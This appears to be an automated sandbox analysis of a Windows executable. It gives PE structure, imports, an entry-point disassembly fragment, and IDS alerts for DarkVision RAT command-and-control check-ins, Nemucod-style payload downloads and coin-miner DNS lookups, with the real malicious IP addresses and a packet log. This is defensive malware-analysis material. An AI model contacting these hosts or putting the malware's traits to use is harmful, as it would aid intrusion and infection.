                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:7182b1ea6f92adbf459a2c65d8d4dd9e
Instruction
dec eax
sub esp, 28h
dec ecx
mov eax, 00000160h
dec eax
xor edx, edx
dec eax
mov ecx, 40020444h
add dword ptr [eax], eax
add byte ptr [eax], al
call 00007F3A187B2998h
dec eax
xor ecx, ecx
call 00007F3A187B2996h
dec eax
mov dword ptr [0001F420h], eax
dec ebp
xor eax, eax
dec eax
mov edx, 00001000h
dec eax
xor ecx, ecx
call 00007F3A187B2983h
dec eax
mov dword ptr [0001F3FFh], eax
dec eax
mov eax, 4001F088h
add dword ptr [eax], eax
add byte ptr [eax], al
dec eax
mov dword ptr [0001F43Eh], eax
call 00007F3A187BD9BAh
call 00007F3A187BD649h
call 00007F3A187B9770h
call 00007F3A187B8D63h
call 00007F3A187B85F2h
call 00007F3A187B82C1h
call 00007F3A187B79B8h
call 00007F3A187B6E6Fh
call 00007F3A187B2A92h
call 00007F3A187BB955h
call 00007F3A187BA1B4h
dec eax
mov edx, 4001F02Ah
add dword ptr [eax], eax
add byte ptr [eax], al
dec eax
lea ecx, dword ptr [0001F3C6h]
call 00007F3A187BD9E2h
dec eax
mov ecx, FFFFFFF5h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1f198 | 0xc8 | .data
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x22000 | 0xc80 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1d000 | 0x10c8 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1f6a8 | 0x448 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.code | 0x1000 | 0x5a99 | 0x5c00 | 1d0c9527ee8a05d865534bbee542e47e | False | 0.364937160326087 | data | 5.471300917234666 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.text | 0x7000 | 0x102c5 | 0x10400 | 6e20cd0789b9aa50422f27883fd5e9bc | False | 0.4876201923076923 | data | 6.333951903059359 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x18000 | 0x4b2d | 0x4c00 | 5adef60093ee71127f4e613fda5f050f | False | 0.6623149671052632 | VAX-order 68k Blit mpx/mux executable | 6.662073317603483 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata | 0x1d000 | 0x10c8 | 0x1200 | 415f7b43ac6a86ff843649544b818973 | False | 0.466796875 | data | 4.88380909718978 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1f000 | 0x2318 | 0x1600 | 9591a60776db6831ff38026b5b3ff33e | False | 0.32848011363636365 | data | 4.299370598184235 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x22000 | 0xc80 | 0xe00 | 50cebeb29ad586af6894795db41edaa9 | False | 0.7698102678571429 | data | 7.255536006086562 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_RCDATA | 0x2221c | 0x7cc | data | | | 1.0055110220440882
RT_RCDATA | 0x229e8 | 0x1 | very short file (no magic) | | | 9.0
RT_RCDATA | 0x229ec | 0x1a | data | | | 1.3461538461538463
RT_RCDATA | 0x22a08 | 0xe | zlib compressed data | | | 1.5714285714285714
RT_MANIFEST | 0x22a18 | 0x267 | XML 1.0 document, ASCII text | | | 0.5284552845528455
DLL | Import
msvcrt.dll | memset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
KERNEL32.dll | GetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetShortPathNameW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetProcAddress, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, RtlLookupFunctionEntry, RtlVirtualUnwind, RemoveVectoredExceptionHandler, AddVectoredExceptionHandler, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
SHELL32.DLL | ShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
WINMM.DLL | timeBeginPeriod
OLE32.DLL | CoInitialize, CoTaskMemFree
SHLWAPI.DLL | PathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW
USER32.DLL | CharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, GetWindowLongPtrW, GetWindowTextLengthW, GetWindowTextW, EnableWindow, DestroyWindow, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, GetSystemMetrics, CreateWindowExW, SetWindowLongPtrW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
GDI32.DLL | GetStockObject
COMCTL32.DLL | InitCommonControlsEx
Timestamp | SID | Signature | Severity | Source IP+Port | Dest IP+Port | Protocol
2024-12-09T07:37:29.980726+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.449738 | 154.216.20.243443 | TCP
2024-12-09T07:37:29.989191+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.449739 | 185.157.162.2165200 | TCP
2024-12-09T07:37:30.470669+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.449737 | 154.216.20.243443 | TCP
2024-12-09T07:37:31.145554+0100 | 2022482 | ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 | 1 | 192.168.2.449737 | 154.216.20.243443 | TCP
2024-12-09T07:37:31.426940+0100 | 2021954 | ET MALWARE JS/Nemucod.M.gen downloading EXE payload | 1 | 154.216.20.243443 | 192.168.2.449737 | TCP
2024-12-09T07:37:33.710760+0100 | 2045619 | ET MALWARE Win32/DarkVision RAT CnC Checkin M3 | 1 | 192.168.2.449739 | 185.157.162.2165200 | TCP
2024-12-09T07:37:35.410820+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.449741 | 185.157.162.2165200 | TCP
2024-12-09T07:37:36.142909+0100 | 2036289 | ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) | 2 | 192.168.2.454892 | 1.1.1.153 | UDP
2024-12-09T07:37:38.092973+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.449744 | 185.157.162.2165200 | TCP
2024-12-09T07:37:40.827923+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.449745 | 185.157.162.2165200 | TCP
2024-12-09T07:37:43.495962+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.449746 | 185.157.162.2165200 | TCP
2024-12-09T07:37:46.191236+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.449747 | 185.157.162.2165200 | TCP
2024-12-09T07:38:05.335051+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.449740 | 154.216.20.243443 | TCP
2024-12-09T07:38:29.876691+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.449764 | 154.216.20.243443 | TCP
2024-12-09T07:38:41.565655+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.449848 | 185.157.162.2165200 | TCP
2024-12-09T07:38:45.306325+0100 | 2045619 | ET MALWARE Win32/DarkVision RAT CnC Checkin M3 | 1 | 192.168.2.449848 | 185.157.162.2165200 | TCP
2024-12-09T07:38:46.992724+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.449863 | 185.157.162.2165200 | TCP
2024-12-09T07:38:49.693183+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.449870 | 185.157.162.2165200 | TCP
2024-12-09T07:38:52.366437+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.449876 | 185.157.162.2165200 | TCP
2024-12-09T07:38:55.065857+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.449883 | 185.157.162.2165200 | TCP
2024-12-09T07:38:57.772811+0100 | 2045618 | ET MALWARE Win32/DarkVision RAT CnC Checkin M1 | 1 | 192.168.2.449892 | 185.157.162.2165200 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 9, 2024 07:37:03.264318943 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:03.264357090 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:03.264419079 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:03.279232025 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:03.279247999 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:07.934281111 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:07.934410095 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:07.938092947 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:07.938101053 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:07.938350916 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:07.949891090 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:07.995341063 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.605149984 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.605180979 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.605196953 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.605237961 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:08.605261087 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.605276108 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:08.605307102 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:08.724087954 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.724113941 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.724338055 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:08.724349976 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.724397898 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:08.800028086 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.800054073 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.800124884 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:08.800133944 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.800182104 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:08.888993979 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.889014006 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.889087915 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:08.889097929 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.889147043 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:08.921972036 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.921994925 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.922193050 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:08.922204018 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.922254086 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:08.943069935 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.943085909 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.943156004 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:08.943162918 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.943214893 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:08.996747971 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.996766090 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.996922970 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:08.996932030 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:08.996977091 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:09.095451117 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.095470905 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.095566988 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:09.095592976 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.095634937 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:09.109061003 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.109077930 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.109158993 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:09.109186888 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.109224081 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:09.122193098 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.122210979 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.122267008 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:09.122277021 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.122312069 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:09.134397984 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.134414911 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.134493113 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:09.134501934 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.134540081 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:09.144781113 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.144798994 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.144860983 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:09.144867897 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.144911051 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:09.170211077 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.170228004 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.170300961 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:09.170325041 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.170367002 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:09.181543112 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.181561947 CET | 443 | 49730 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:09.181618929 CET | 49730 | 443 | 192.168.2.4 | 154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.181626081 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.181663990 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.283307076 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.283334017 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.283401012 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.283426046 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.283490896 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.293967962 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.293989897 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.294074059 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.294095993 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.294137955 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.303798914 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.303814888 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.303949118 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.303957939 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.304001093 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.311911106 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.311932087 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.311964035 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.311973095 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.312010050 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.312037945 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.320596933 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.320616007 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.320674896 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.320682049 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.320715904 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.329960108 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.329977036 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.330065012 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.330073118 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.330115080 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.363219976 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.363236904 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.363293886 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.363301992 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.363346100 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.468498945 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.468523026 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.468602896 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.468616962 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.468663931 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.476490974 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.476506948 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.476583004 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.476588964 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.476641893 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.483577013 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.483597040 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.483633995 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.483639002 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.483673096 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.483695984 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.491852999 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.491868973 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.491923094 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.491930008 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.491977930 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.499938965 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.499953985 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.500005007 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.500011921 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.500057936 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.507643938 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.507659912 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.507714987 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.507724047 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.507756948 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.515707970 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.515723944 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.515794039 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.515801907 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.515845060 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.518568039 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.555844069 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.555860996 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.555927038 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.555934906 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.555977106 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.660774946 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.660794020 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.660871983 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.660878897 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.660923958 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.668560028 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.668576002 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.668629885 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.668637991 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.668673038 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.672079086 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.672137976 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.672142982 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.672167063 CET44349730154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:09.672208071 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:09.682405949 CET49730443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:26.993963957 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:26.993990898 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:26.994055033 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:26.994199038 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:26.994239092 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:26.994285107 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:26.995843887 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:26.995856047 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:26.995975971 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:26.995995045 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:29.868977070 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:29.980658054 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:29.980726004 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:29.985352993 CET49738443192.168.2.4154.216.20.243
